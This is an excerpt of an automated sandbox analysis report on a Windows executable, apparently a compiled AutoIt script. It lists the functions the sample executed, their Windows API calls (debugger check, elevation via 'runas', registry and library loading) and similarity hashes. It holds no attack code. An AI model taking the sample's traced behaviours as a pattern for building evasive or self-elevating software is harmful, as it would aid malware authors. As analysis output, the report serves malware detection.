LoadLibraryA 86893->86895 86894->86871 86894->86872 86895->86894 86896 40ee87 GetProcAddress 86895->86896 86896->86894 86898 40e5bf 86897->86898 86899 40eee6 LoadLibraryA 86897->86899 86898->86870 86898->86877 86899->86898 86900 40eef7 GetProcAddress 86899->86900 86900->86898 86905 40eec0 LoadLibraryA GetProcAddress 86901->86905 86903 40e5d3 GetNativeSystemInfo 86903->86880 86903->86881 86904->86872 86905->86903 86906 42e89e 86913 40c000 86906->86913 86908 42e8ac 86909 409a40 165 API calls 86908->86909 86910 42e8ca 86909->86910 86924 44b92e VariantClear 86910->86924 86912 42f3ae 86914 40c014 86913->86914 86915 40c007 86913->86915 86917 40c01a 86914->86917 86918 40c02c 86914->86918 86925 409210 VariantClear 86915->86925 86926 409210 VariantClear 86917->86926 86919 41171a 75 API calls 86918->86919 86923 40c033 86919->86923 86920 40c00f 86920->86908 86922 40c023 86922->86908 86923->86908 86924->86912 86925->86920 86926->86922

                                                                                                                                                                                                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                                                                                                                                                                                                Function 00409A40 Relevance: 32.2, APIs: 15, Strings: 2, Instructions: 2432COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00409A61
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                                                                                                                                                                                                                                                                                                                                • CharUpperBuffW.USER32(?,?), ref: 00409AF5
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: BuffCharException@8ThrowUpper_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: 0vH$4RH
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1143807570-2085553193
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 99d1197353860daa2513f82cc2f46b4e9eeffbfa9250308b68df757a7373a6ee
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 7c8f52bff4b3ea9a641e6aac08ab5e1c8beb32691f0f21fab5f23224d73a3634
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 99d1197353860daa2513f82cc2f46b4e9eeffbfa9250308b68df757a7373a6ee
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 34238170A043109FD724DF25D480A6BB7E1BF89304F54896EE84A9B391D739EC46CB9B
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0040D6D0 Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 141windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000104,?,00000001,?,00000000), ref: 0040D6E5
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401F80: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\AENiBH7X1q.exe,00000104,?,?,?,?,00000000), ref: 00401FAD
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 00402078
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 0040208E
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 004020A4
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 004020BA
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401F80: _wcscpy.LIBCMT ref: 004020EF
                                                                                                                                                                                                                                                                                                                                                                                                                • IsDebuggerPresent.KERNEL32(?), ref: 0040D6F1
                                                                                                                                                                                                                                                                                                                                                                                                                • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\AENiBH7X1q.exe,00000104,?,004A7CF8,004A7CFC), ref: 0040D763
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401440: GetFullPathNameW.KERNEL32(?,00000104,?,00000000), ref: 00401483
                                                                                                                                                                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?,00000001,C:\Users\user\Desktop\AENiBH7X1q.exe,00000004), ref: 0040D7D6
                                                                                                                                                                                                                                                                                                                                                                                                                • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,004846D6,00000010), ref: 00431AAB
                                                                                                                                                                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?,C:\Users\user\Desktop\AENiBH7X1q.exe,00000004), ref: 00431B0E
                                                                                                                                                                                                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104,C:\Users\user\Desktop\AENiBH7X1q.exe,00000004), ref: 00431B3F
                                                                                                                                                                                                                                                                                                                                                                                                                • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 00431B8B
                                                                                                                                                                                                                                                                                                                                                                                                                • ShellExecuteW.SHELL32(00000000), ref: 00431B92
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004101F0: GetSysColorBrush.USER32(0000000F), ref: 004101F9
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004101F0: LoadCursorW.USER32(00000000,00007F00), ref: 00410209
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004101F0: LoadIconW.USER32(?,00000063), ref: 0041021F
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004101F0: LoadIconW.USER32(?,000000A4), ref: 00410232
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004101F0: LoadIconW.USER32(?,000000A2), ref: 00410245
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004101F0: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041026A
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004101F0: RegisterClassExW.USER32 ref: 004102C6
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004103E0: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 00410415
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004103E0: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 0041043E
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004103E0: ShowWindow.USER32(?,00000000), ref: 00410454
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004103E0: ShowWindow.USER32(?,00000000), ref: 0041045E
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040E1E0: _memset.LIBCMT ref: 0040E202
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040E1E0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E2C7
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memset_wcscpy
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: @GH$@GH$C:\Users\user\Desktop\AENiBH7X1q.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2493088469-1060904090
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 1a0ed8742bd98226e3ba0f055742ccaca08136dd93b2b863f89549b94dfb798c
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: f6e0ab4c143dd9a1f797559286fb6c41f0380d60009eb7dc722615656bf0e84e
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1a0ed8742bd98226e3ba0f055742ccaca08136dd93b2b863f89549b94dfb798c
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0341F731618341ABD320F7A19C49BAF3BA4AB96704F04493FF941672D1DBBC9949C72E
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0040E470 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 165COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                control_flow_graph 1254 40e470-40e500 call 40c060 GetVersionExW call 4021e0 call 40e600 call 40e620 1263 40e506-40e509 1254->1263 1264 42accc-42acd1 1254->1264 1267 40e540-40e555 call 40ee70 1263->1267 1268 40e50b-40e51c 1263->1268 1265 42acd3-42acdb 1264->1265 1266 42acdd-42ace0 1264->1266 1269 42ad12-42ad20 1265->1269 1270 42ace2-42aceb 1266->1270 1271 42aced-42acf0 1266->1271 1285 40e557-40e573 GetCurrentProcess call 40ee30 1267->1285 1286 40e579-40e5a8 1267->1286 1272 40e522-40e525 1268->1272 1273 42ac9b-42aca7 1268->1273 1284 42ad28-42ad2d GetSystemInfo 1269->1284 1270->1269 1271->1269 1275 42acf2-42ad06 1271->1275 1272->1267 1276 40e527-40e537 1272->1276 1278 42acb2-42acba 1273->1278 1279 42aca9-42acad 1273->1279 1280 42ad08-42ad0c 1275->1280 1281 42ad0e 1275->1281 1282 42acbf-42acc7 1276->1282 1283 40e53d 1276->1283 1278->1267 1279->1267 1280->1269 1281->1269 1282->1267 1283->1267 1287 42ad38-42ad3d GetSystemInfo 1284->1287 1285->1286 1295 40e575 1285->1295 1286->1287 1288 40e5ae-40e5c3 call 40eee0 1286->1288 1288->1284 1294 40e5c9-40e5db call 40eea0 GetNativeSystemInfo 1288->1294 1298 40e5e0-40e5ef 1294->1298 1299 40e5dd-40e5de FreeLibrary 1294->1299 1295->1286 1300 40e5f1-40e5f2 FreeLibrary 1298->1300 1301 40e5f4-40e5ff 1298->1301 1299->1298 1300->1301
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • GetVersionExW.KERNEL32 ref: 0040E495
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?,?), ref: 0040E560
                                                                                                                                                                                                                                                                                                                                                                                                                • GetNativeSystemInfo.KERNELBASE(?,?), ref: 0040E5D3
                                                                                                                                                                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 0040E5DE
                                                                                                                                                                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 0040E5F2
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: pMH
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2923339712-2522892712
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 3f36deb7b7369dd68d3c05326faf84e57561e58110467ef3184d2bc56fc1d5cf
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 31d199e0849a18b4fe3a20375a839c17b1fda7a8e5a404adfed2e153d323e8b3
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3f36deb7b7369dd68d3c05326faf84e57561e58110467ef3184d2bc56fc1d5cf
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D4612E71508792AEC311CB69C44425ABFE07B6A308F580E6EE48483A42D379E568C7AB
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0040EB70 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EB55,0040D86E), ref: 0040EB7B
                                                                                                                                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EB8D
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: IsThemeActive$uxtheme.dll
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2574300362-3542929980
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 9e55e894ab04f38af4b02d6559f2dae0f2ca0bab174211e780b997e8b6ae5f43
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: e8120cabfd18d8fe06d2f96d8b82b2b5a4bcadd10797c678d2963416b1e4c3b8
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9e55e894ab04f38af4b02d6559f2dae0f2ca0bab174211e780b997e8b6ae5f43
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 05D0C9B49407039AD7306F72C918B0A7BE4AB50342F204C3EF996A1694DBBCD0508B28
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00410B90 Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 167registryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                                                                                                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00410C44
                                                                                                                                                                                                                                                                                                                                                                                                                • __wsplitpath.LIBCMT ref: 00410C61
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcsncat.LIBCMT ref: 00410C78
                                                                                                                                                                                                                                                                                                                                                                                                                • __wmakepath.LIBCMT ref: 00410C94
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00413E3C: __wmakepath_s.LIBCMT ref: 00413E52
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscpy.LIBCMT ref: 00410CCC
                                                                                                                                                                                                                                                                                                                                                                                                                • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00020019,?), ref: 00410CE9
                                                                                                                                                                                                                                                                                                                                                                                                                • RegQueryValueExW.ADVAPI32 ref: 00429BE4
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 00429C43
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00429C55
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00429C66
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 00429C80
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcsncpy.LIBCMT ref: 00429CC0
                                                                                                                                                                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00429CDE
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _wcscat_wcslen$CloseException@8FileModuleNameOpenQueryThrowValue__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpystd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: Include$Software\AutoIt v3\AutoIt$\
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1004883554-2276155026
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: bd70d1de0bf944503d0c9583a27c2bfe501ff96b935e7e88766a5686d489513a
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: ef4714a7fd58501e566ba693257e1f196c1b97611c18bc9c35ab262cfa7686fb
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bd70d1de0bf944503d0c9583a27c2bfe501ff96b935e7e88766a5686d489513a
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B961B3B1508340DFC300EF65EC8599BBBE8FB99704F44882EF544C3261EBB59948CB5A
                                                                                                                                                                                                                                                                                                                                                                                                                Function 004095C7 Relevance: 21.5, APIs: 14, Instructions: 539sleeptimeCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00409A40: _wcslen.LIBCMT ref: 00409A61
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00409A40: CharUpperBuffW.USER32(?,?), ref: 00409AF5
                                                                                                                                                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(0000000A), ref: 00409870
                                                                                                                                                                                                                                                                                                                                                                                                                • timeGetTime.WINMM ref: 00409880
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: BuffCharSleepTimeUpper_wcslentime
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3219444185-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: b124ae733e2c30a8df030179fd7ebda2966fc041c6879d6beed06594e2dda547
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 79dfb759edd1749a95aa3438e3198289cebfc990e9c1b7da565b255c5aac8c6d
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b124ae733e2c30a8df030179fd7ebda2966fc041c6879d6beed06594e2dda547
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D422F171608342ABC724DF64C984BABB7A0BF89304F14492FE54997392D77CEC45CB9A
                                                                                                                                                                                                                                                                                                                                                                                                                Function 004523CE Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 145COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: __fread_nolock$_fseek_wcscpy
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: FILE
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3888824918-3121273764
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: e8200e6015bbe3313da03f0c122791b2111f624a8fcd35516e511649d5e709ac
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: c0f9aeb359a44d31a21a8716142a7f32772eb03c7b5129f1ec28ea3a2d041f76
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e8200e6015bbe3313da03f0c122791b2111f624a8fcd35516e511649d5e709ac
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D541EFB1504300BBD310EB55CC81FEB73A9AFC8718F54491EFA8457181F679E644C7AA
                                                                                                                                                                                                                                                                                                                                                                                                                Function 004102F0 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule

